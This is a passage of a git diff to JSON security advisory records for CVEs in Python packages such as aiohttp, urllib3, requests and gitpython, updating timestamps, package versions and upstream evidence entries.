b/advisories/BREW-apm-CVE-2023-26302.json index e1f8687832e..16239531406 100644 --- a/advisories/BREW-apm-CVE-2023-26302.json +++ b/advisories/BREW-apm-CVE-2023-26302.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2023-26302", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-jrwr-5x3p-hvc3", "CVE-2023-26302", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "markdown-it-py", - "subject_version": "4.2.0", - "key": "pkg:pypi/markdown-it-py@4.2.0", - "resource": "markdown-it-py" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2023-26303.json b/advisories/BREW-apm-CVE-2023-26303.json index 68e313a5105..4f77f0e08cb 100644 --- a/advisories/BREW-apm-CVE-2023-26303.json +++ b/advisories/BREW-apm-CVE-2023-26303.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2023-26303", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-vrjv-mxr7-vjf8", "CVE-2023-26303", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "markdown-it-py", - "subject_version": "4.2.0", - "key": "pkg:pypi/markdown-it-py@4.2.0", - "resource": "markdown-it-py" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2023-32681.json b/advisories/BREW-apm-CVE-2023-32681.json index c36dc9f06bd..7be2961e4d8 100644 --- a/advisories/BREW-apm-CVE-2023-32681.json +++ b/advisories/BREW-apm-CVE-2023-32681.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2023-32681", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-j8r2-6x86-q33q", "CVE-2023-32681", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2023-37276.json b/advisories/BREW-apm-CVE-2023-37276.json index a6b20cac0b7..a29a8b4ed74 100644 --- a/advisories/BREW-apm-CVE-2023-37276.json +++ b/advisories/BREW-apm-CVE-2023-37276.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2023-37276", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-45c4-8wx5-qw6w", "CVE-2023-37276", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2023-40267.json b/advisories/BREW-apm-CVE-2023-40267.json index c62364b83bd..14271ef089e 100644 --- a/advisories/BREW-apm-CVE-2023-40267.json +++ b/advisories/BREW-apm-CVE-2023-40267.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2023-40267", "published": "2026-08-13T16:35:55Z", - "modified": "2026-09-02T08:44:40Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-pr76-5cm5-w9cj", "CVE-2023-40267", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.32", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.61" + "resource_purl": "pkg:pypi/gitpython@3.1.62" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", + "subject_version": "3.1.62", + "key": "pkg:pypi/gitpython@3.1.62", "resource": "gitpython" } ] diff --git a/advisories/BREW-apm-CVE-2023-40590.json b/advisories/BREW-apm-CVE-2023-40590.json index 5e2caffa64a..35eb4f85940 100644 --- a/advisories/BREW-apm-CVE-2023-40590.json +++ b/advisories/BREW-apm-CVE-2023-40590.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2023-40590", "published": "2026-08-13T16:35:55Z", - "modified": "2026-09-02T08:44:40Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-wfm5-v35h-vwf4", "CVE-2023-40590", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.33", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.61" + "resource_purl": "pkg:pypi/gitpython@3.1.62" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", + "subject_version": "3.1.62", + "key": "pkg:pypi/gitpython@3.1.62", "resource": "gitpython" } ] diff --git a/advisories/BREW-apm-CVE-2023-41040.json b/advisories/BREW-apm-CVE-2023-41040.json index d5f42735dec..267c6cacf11 100644 --- a/advisories/BREW-apm-CVE-2023-41040.json +++ b/advisories/BREW-apm-CVE-2023-41040.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2023-41040", "published": "2026-08-13T16:35:55Z", - "modified": "2026-09-02T08:44:40Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-cwvm-v4w8-q58c", "CVE-2023-41040", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.37", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.61" + "resource_purl": "pkg:pypi/gitpython@3.1.62" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", + "subject_version": "3.1.62", + "key": "pkg:pypi/gitpython@3.1.62", "resource": "gitpython" } ] diff --git a/advisories/BREW-apm-CVE-2023-43804.json b/advisories/BREW-apm-CVE-2023-43804.json index cfb10b2b282..cfe613bedea 100644 --- a/advisories/BREW-apm-CVE-2023-43804.json +++ b/advisories/BREW-apm-CVE-2023-43804.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2023-43804", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-v845-jxx5-vc9f", "CVE-2023-43804", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2023-45803.json b/advisories/BREW-apm-CVE-2023-45803.json index 16c027e9a2e..50b26090a34 100644 --- a/advisories/BREW-apm-CVE-2023-45803.json +++ b/advisories/BREW-apm-CVE-2023-45803.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2023-45803", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-g4mx-q9vg-27p4", "CVE-2023-45803", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2023-47627.json b/advisories/BREW-apm-CVE-2023-47627.json index 3c36ffbd41a..851dedbafdf 100644 --- a/advisories/BREW-apm-CVE-2023-47627.json +++ b/advisories/BREW-apm-CVE-2023-47627.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2023-47627", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-gfw2-4jvh-wgfg", "CVE-2023-47627", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2023-47641.json b/advisories/BREW-apm-CVE-2023-47641.json index a5cd7466784..b72c98a5bd1 100644 --- a/advisories/BREW-apm-CVE-2023-47641.json +++ b/advisories/BREW-apm-CVE-2023-47641.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2023-47641", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-xx9p-xxvh-7g8j", "CVE-2023-47641", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2023-49081.json b/advisories/BREW-apm-CVE-2023-49081.json index b9de273323c..489d4068f6d 100644 --- a/advisories/BREW-apm-CVE-2023-49081.json +++ b/advisories/BREW-apm-CVE-2023-49081.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2023-49081", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-q3qx-c6g2-7pw2", "CVE-2023-49081", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2023-49082.json b/advisories/BREW-apm-CVE-2023-49082.json index d91498ca06d..48cee378a2a 100644 --- a/advisories/BREW-apm-CVE-2023-49082.json +++ b/advisories/BREW-apm-CVE-2023-49082.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2023-49082", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-qvrw-v9rv-5rjx", "CVE-2023-49082", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2024-22190.json b/advisories/BREW-apm-CVE-2024-22190.json index bc33781d105..82cfefd2d77 100644 --- a/advisories/BREW-apm-CVE-2024-22190.json +++ b/advisories/BREW-apm-CVE-2024-22190.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2024-22190", "published": "2026-08-13T16:35:55Z", - "modified": "2026-09-02T08:44:40Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-2mqj-m65w-jghx", "CVE-2024-22190", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.41", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.61" + "resource_purl": "pkg:pypi/gitpython@3.1.62" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", + "subject_version": "3.1.62", + "key": "pkg:pypi/gitpython@3.1.62", "resource": "gitpython" } ] diff --git a/advisories/BREW-apm-CVE-2024-23334.json b/advisories/BREW-apm-CVE-2024-23334.json index 036bcccc47f..0089173f245 100644 --- a/advisories/BREW-apm-CVE-2024-23334.json +++ b/advisories/BREW-apm-CVE-2024-23334.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2024-23334", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-5h86-8mv2-jq9f", "CVE-2024-23334", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2024-23829.json b/advisories/BREW-apm-CVE-2024-23829.json index c6a15f7ee71..a3283e163c4 100644 --- a/advisories/BREW-apm-CVE-2024-23829.json +++ b/advisories/BREW-apm-CVE-2024-23829.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2024-23829", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-8qpw-xqxj-h4r2", "CVE-2024-23829", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2024-27306.json b/advisories/BREW-apm-CVE-2024-27306.json index 8a558dafefe..e5fe4ac630b 100644 --- a/advisories/BREW-apm-CVE-2024-27306.json +++ b/advisories/BREW-apm-CVE-2024-27306.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2024-27306", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-7gpw-8wmc-pm8g", "CVE-2024-27306", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2024-30251.json b/advisories/BREW-apm-CVE-2024-30251.json index ecaf6349f1f..eb63d22d3d6 100644 --- a/advisories/BREW-apm-CVE-2024-30251.json +++ b/advisories/BREW-apm-CVE-2024-30251.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2024-30251", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-5m98-qgg9-wh84", "CVE-2024-30251", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2024-35195.json b/advisories/BREW-apm-CVE-2024-35195.json index 526231a92df..4a8f7b6802b 100644 --- a/advisories/BREW-apm-CVE-2024-35195.json +++ b/advisories/BREW-apm-CVE-2024-35195.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2024-35195", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-9wx4-h78v-vm56", "CVE-2024-35195", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2024-3651.json b/advisories/BREW-apm-CVE-2024-3651.json index 9ab8ad9c1fb..3ab84f40fa3 100644 --- a/advisories/BREW-apm-CVE-2024-3651.json +++ b/advisories/BREW-apm-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2024-3651", "published": "2026-08-13T16:35:55Z", - "modified": "2026-09-02T08:44:40Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.19", - "key": "pkg:pypi/idna@3.19", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2024-37891.json b/advisories/BREW-apm-CVE-2024-37891.json index c01c25cb607..158da15e482 100644 --- a/advisories/BREW-apm-CVE-2024-37891.json +++ b/advisories/BREW-apm-CVE-2024-37891.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2024-37891", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-34jh-p97f-mpxf", "CVE-2024-37891", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2024-42367.json b/advisories/BREW-apm-CVE-2024-42367.json index e0c8b05f3f4..f9b31cf7087 100644 --- a/advisories/BREW-apm-CVE-2024-42367.json +++ b/advisories/BREW-apm-CVE-2024-42367.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2024-42367", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-jwhx-xcg6-8xhj", "CVE-2024-42367", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2024-47081.json b/advisories/BREW-apm-CVE-2024-47081.json index 51591569103..8b4e404b34c 100644 --- a/advisories/BREW-apm-CVE-2024-47081.json +++ b/advisories/BREW-apm-CVE-2024-47081.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2024-47081", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-9hjg-9r4m-mvj7", "CVE-2024-47081", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2024-52303.json b/advisories/BREW-apm-CVE-2024-52303.json index 4d5adf84a22..39b25220aa5 100644 --- a/advisories/BREW-apm-CVE-2024-52303.json +++ b/advisories/BREW-apm-CVE-2024-52303.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2024-52303", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-27mf-ghqm-j3j8", "CVE-2024-52303", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2024-52304.json b/advisories/BREW-apm-CVE-2024-52304.json index a406e53566d..8a319026c5c 100644 --- a/advisories/BREW-apm-CVE-2024-52304.json +++ b/advisories/BREW-apm-CVE-2024-52304.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2024-52304", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-8495-4g3g-x7pr", "CVE-2024-52304", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2024-6345.json b/advisories/BREW-apm-CVE-2024-6345.json index 46dccc99b83..cbcef515f45 100644 --- a/advisories/BREW-apm-CVE-2024-6345.json +++ b/advisories/BREW-apm-CVE-2024-6345.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2024-6345", "published": "2026-08-13T16:35:55Z", - "modified": "2026-09-02T08:44:40Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-cx63-2mw6-8hw5", "BIT-setuptools-2024-6345", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "84.0.0", - "key": "pkg:pypi/setuptools@84.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2025-43859.json b/advisories/BREW-apm-CVE-2025-43859.json index a91910aa4d1..d43dcba53d4 100644 --- a/advisories/BREW-apm-CVE-2025-43859.json +++ b/advisories/BREW-apm-CVE-2025-43859.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2025-43859", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-vqfr-h8mv-ghfj", "CVE-2025-43859", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "h11", - "subject_version": "0.16.0", - "key": "pkg:pypi/h11@0.16.0", - "resource": "h11" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2025-47273.json b/advisories/BREW-apm-CVE-2025-47273.json index f2bfb85c533..d346193b5f1 100644 --- a/advisories/BREW-apm-CVE-2025-47273.json +++ b/advisories/BREW-apm-CVE-2025-47273.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2025-47273", "published": "2026-08-13T16:35:55Z", - "modified": "2026-09-02T08:44:40Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-5rjg-fvgr-3xxf", "BIT-setuptools-2025-47273", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "84.0.0", - "key": "pkg:pypi/setuptools@84.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2025-50181.json b/advisories/BREW-apm-CVE-2025-50181.json index c6444d27c2e..541fac3d1e9 100644 --- a/advisories/BREW-apm-CVE-2025-50181.json +++ b/advisories/BREW-apm-CVE-2025-50181.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2025-50181", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-pq67-6m6q-mj2v", "CVE-2025-50181", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2025-50182.json b/advisories/BREW-apm-CVE-2025-50182.json index 627000dd938..99981a99a41 100644 --- a/advisories/BREW-apm-CVE-2025-50182.json +++ b/advisories/BREW-apm-CVE-2025-50182.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2025-50182", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-48p4-8xcf-vxj5", "CVE-2025-50182", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2025-53643.json b/advisories/BREW-apm-CVE-2025-53643.json index 0572dca421a..326afbae41a 100644 --- a/advisories/BREW-apm-CVE-2025-53643.json +++ b/advisories/BREW-apm-CVE-2025-53643.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2025-53643", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:31Z", "upstream": [ "GHSA-9548-qrrj-x5pj", "CVE-2025-53643", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2025-66418.json b/advisories/BREW-apm-CVE-2025-66418.json index 70637d8ecfe..238abe42494 100644 --- a/advisories/BREW-apm-CVE-2025-66418.json +++ b/advisories/BREW-apm-CVE-2025-66418.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2025-66418", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-gm62-xv2j-4w53", "CVE-2025-66418", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2025-66471.json b/advisories/BREW-apm-CVE-2025-66471.json index 88b0bda68b2..9e493db4883 100644 --- a/advisories/BREW-apm-CVE-2025-66471.json +++ b/advisories/BREW-apm-CVE-2025-66471.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-apm-CVE-2025-66471", "published": "2026-08-13T16:35:55Z", - "modified": "2026-08-13T16:35:55Z", + "modified": "2026-09-10T18:52:52Z", "upstream": [ "GHSA-2xpw-w6gg-jr37", "CVE-2025-66471", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-apm-CVE-2025-68146.json b/advisories/BREW-apm-CVE-2025-68146.json index 